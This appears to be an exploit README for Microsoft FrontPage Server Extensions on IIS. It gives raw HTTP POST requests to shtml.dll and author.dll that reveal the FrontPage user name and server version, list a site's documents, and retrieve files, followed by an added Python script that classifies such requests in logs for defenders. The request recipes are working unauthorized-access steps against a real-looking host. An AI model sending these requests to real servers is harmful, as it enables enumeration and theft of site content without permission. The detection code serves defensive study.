Front-Page-Exploit
==================

On Windows NT and IIS, FrontPage security is basically controlled by the access rights to the three files Admin.dll, Author.dll, and Shtml.dll. These rights respectively determine administration, authoring, and browsing rights. For example, if a remote user is able to read and execute Admin.dll, then that user is able to administer the web site.

The authentication DLLs are laid out as follows (the `_vti_aut` and `_vti_adm` folders sit under `_vti_bin`, as the request paths below show):

```
Web Root
  \_vti_bin
    shtml.dll
    \_vti_aut
      author.dll
    \_vti_adm
      admin.dll
```

Request 1:

```http
POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0
Connection: Keep-Alive
Date: Mon, 23 Mar 2003 00:00:15 GMT
Accept: */*
Host: 208.51.43.138
User-Agent: MSFrontPage/4.0
Content-Type: application/x-www-form-urlencoded
MIME-Version: 1.0
X-Vermeer-Content-Type: application/x-www-form-urlencoded
Content-Length: 59

method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f
```

The `open service` body above displays the FrontPage user name. Sending the following body instead identifies the server version:

```
method=server+version%3a4%2e0%2e2%2e2611
```

---

Request 2:

```http
POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
MIME-Version: 1.0
User-Agent: MSFrontPage/4.0
Accept: auth/sicily
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
X-Vermeer-Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive

method=open+service%3a3%2e0%2e2%2e1706&service%5fname=%2f
```

```
method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&
listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=
```

To retrieve a file, you send this as the POST data:

```
method=get+document%3a3%2e0%2e2%2e1105&service%5fname=&document%5fname=about%2fdefault%2ehtm&old%5ftheme%5fhtml=false&force=true&
get%5foption=none&doc%5fversion=
```

Reference Links:

- http://grox.net/doc/web/frontpage/security.htm
- http://sourceforge.net/apps/trac/w3af/ticket/145813
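As an added example that is not part of this repository, the following Python parses FrontPage RPC POST bodies of the form shown above and classifies each request by the privilege tier of the DLL it targets, so a defender can spot `list documents` and `get document` calls in captured traffic or logs. The sample requests are constructed from the ones on this page, and the tier and method tables are assumptions derived from the layout described here.

```python
from urllib.parse import parse_qs, unquote_plus

# Assumed mapping from the handling DLL to the privilege tier described in the README.
TIER_BY_DLL = {
    "shtml.dll": "browse",
    "author.dll": "author",
    "admin.dll": "admin",
}

# RPC methods seen on this page that disclose information or read content.
SENSITIVE_METHODS = {"open service", "server version", "list documents", "get document"}

def parse_rpc_body(body):
    """Split a FrontPage RPC POST body into method name, protocol version and arguments.

    The method field is encoded as 'name:version', e.g. 'open service:3.0.2.1105';
    parse_qs also decodes keys such as service%5fname -> service_name.
    """
    params = parse_qs(body, keep_blank_values=True)
    method_field = params.get("method", [""])[0]
    name, _, version = method_field.partition(":")
    args = {k: v[0] for k, v in params.items() if k != "method"}
    return {"method": name.strip(), "version": version, "args": args}

def classify_request(path, body):
    """Return a finding for one POST to a FrontPage DLL, or None if the path is unrelated."""
    lowered = path.lower()
    if "/_vti_bin/" not in lowered:
        return None
    dll = next((d for d in TIER_BY_DLL if d in lowered), None)
    if dll is None:
        return None
    rpc = parse_rpc_body(body)
    return {
        "tier": TIER_BY_DLL[dll],
        "method": rpc["method"],
        "version": rpc["version"],
        "document": unquote_plus(rpc["args"].get("document_name", "")),
        "sensitive": rpc["method"] in SENSITIVE_METHODS,
    }

# Constructed sample (path, body) pairs modelled on the requests above; not captured traffic.
SAMPLE_REQUESTS = [
    ("/_vti_bin/shtml.dll/_vti_rpc", "method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f"),
    ("/_vti_bin/_vti_aut/author.dll", "method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listRecurse=false"),
    ("/_vti_bin/_vti_aut/author.dll", "method=get+document%3a3%2e0%2e2%2e1105&document%5fname=about%2fdefault%2ehtm&force=true"),
    ("/index.html", "q=1"),
]

def scan(requests=SAMPLE_REQUESTS):
    """Run the classifier over (path, body) pairs and keep only FrontPage RPC findings."""
    return [f for f in (classify_request(p, b) for p, b in requests) if f]
```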